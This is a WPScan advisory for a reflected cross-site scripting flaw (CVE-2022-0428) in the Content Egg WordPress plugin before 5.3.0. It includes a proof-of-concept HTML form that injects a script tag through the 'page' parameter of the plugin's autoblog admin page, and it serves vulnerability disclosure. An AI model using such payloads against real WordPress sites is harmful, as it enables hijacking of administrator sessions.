WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Content Egg < 5.3.0 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape the page parameter before outputting back in an attribute in the Autoblogging admin dashboard, leading to a Reflected Cross-Site Scripting

Proof of Concept

<html>
    <form action="https://example.com/wp-admin/admin.php?page=content-egg-autoblog" method="POST">
        <input type="text" name="page" value='"><script>alert(/XSS/);</script>'>
        <input type="submit" value="Send">
    </form>
</html>

Affects Plugins

content-egg
Fixed in version 5.3.0

References

CVE
CVE-2022-0428

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
071a2f69-9cd6-42a8-a56c-264a589784ab

Timeline

Publicly Published

2022-04-06 (about 2 months ago)

Added

2022-04-06 (about 2 months ago)

Last Updated

2022-04-13 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin